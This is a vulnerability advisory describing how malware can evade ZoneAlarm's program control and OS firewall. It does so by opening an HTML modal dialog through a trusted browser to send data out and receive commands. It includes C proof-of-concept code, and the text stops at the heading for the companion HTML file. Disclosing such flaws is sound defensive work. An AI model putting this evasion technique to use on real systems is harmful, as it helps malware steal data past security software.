|
|
Zone Labs Products Advance Program Control and OS Firewall (Behavioral
Based) Technology Bypass Vulnerability
I. PRODUCT BACKGROUND
ZoneAlarm Pro and Internet Security Suite with its a new level of protection
is what Zone Labs calls an "OS Firewall" based on "Behavior Based Analysis"
has gone beyond network level protection and protects PCs against various
local attacks on a windows machine. Currently available personal firewalls
protects PCs against only network based attacks however the new Zone Labs
"OS firewall" technology monitors activity at the kernel-level and prevents
attacks at various level. The new approach alerts the user by closely
monitoring at kernel level for any unusual activity in the system; like
changes in critical registry keys, changes in start-up entries, any kind of
Interprocess interactions and processes making outbound connections via
other trusted programs. When ZoneAlarm sees unusual activity between
applications, it can put the kibosh on memory being read, or quash
unauthorized driver and service loading. The PoC below discusses how the
ZoneAlarm Advance Program Control and Behavior Based Technology can be
defeated by using HTML Modal Dialog Box.
II. TECHNICAL DESCRIPTION
Zone Alarm products with Advance Program Control or OS Firewall Technology
enabled, detects and blocks almost all those APIs (like Shell,
ShellExecuteEx, SetWindowText, SetDlgItem etc) which are commonly used by
malicious programs to send data via http by piggybacking over other trusted
programs. However, it is still possible for a malicious program (Trojans or
worms etc) to make outbound connections to the evil site by piggybacking
over trusted Internet browser using "HTML Modal Dialog" in conjunction with
simple "JavaScript". Here it is assumed that the default browser (IE or
Firefox etc) has authorization to access internet. In case of the default
installation of ZoneAlarm Pro, IE is by default allowed to access internet.
The PoC (Proof-of-Concept) in Section V explains the hack and the exploit
code is also included for reference.
III. IMPACT
On successful exploitation the malicious program will be able to send the
victim's details and personal system information to the attacker and this
can further leads to complete system compromise.
IV. AFFECTED PRODUCTS
Zone Alarm Pro 6.0.x
Zone Alarm Internet Security Suit 6.0.x
Zone Alarm Firewall with Anti-Spyware 6.1.x
Zone Alarm Firewall with Anti-Virus 6.0.x
Zone Alarm Firewall (Free Version) 6.0.x
V. PROOF-OF-CONCEPT:
By using ShowHTMLDialog() method, it is possible for any malicious program
to creates a modal dialog box that displays HTML. This in turn can be used
to redirect the page to the attacker's site. It is observed that using this
method, ZA Pro and Internet Security Suit is unable to block internet
access. This method can be used by any malicious program to send data
outside via http to the attacker and at the same time it can also receive
the command instructions from the attacker. The detailed exploit code is
given below:
<<< osfwbypass-demo.c >>>
BOOL LoadHtmlDialog(void)
{
HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
if (hinstMSHTML)
{
SHOWHTMLDIALOGFN* pfnShowHTMLDialog;
// Open a Modal Dialog box of HTML content type
pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
TEXT("ShowHTMLDialog"));
if (pfnShowHTMLDialog)
{
IMoniker *pURLMoniker;
// Invoke the html file containing the data to be sent via http
BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
CreateURLMoniker(NULL, bstrURL, &pURLMoniker);
if (pURLMoniker)
{
(*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
pURLMoniker->Release();
}
SysFreeString(bstrURL);
}
FreeLibrary(hinstMSHTML);
}
Return True;
}
<<< +++ >>>
<<< modal-dialog.htm >>>